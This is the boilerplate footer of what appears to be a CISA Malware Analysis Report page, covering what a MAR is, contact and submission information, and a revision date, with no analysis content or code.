What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Revisions

July 21, 2021: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

Please share your thoughts.

We recently updated our anonymous product survey; we'd welcome your feedback.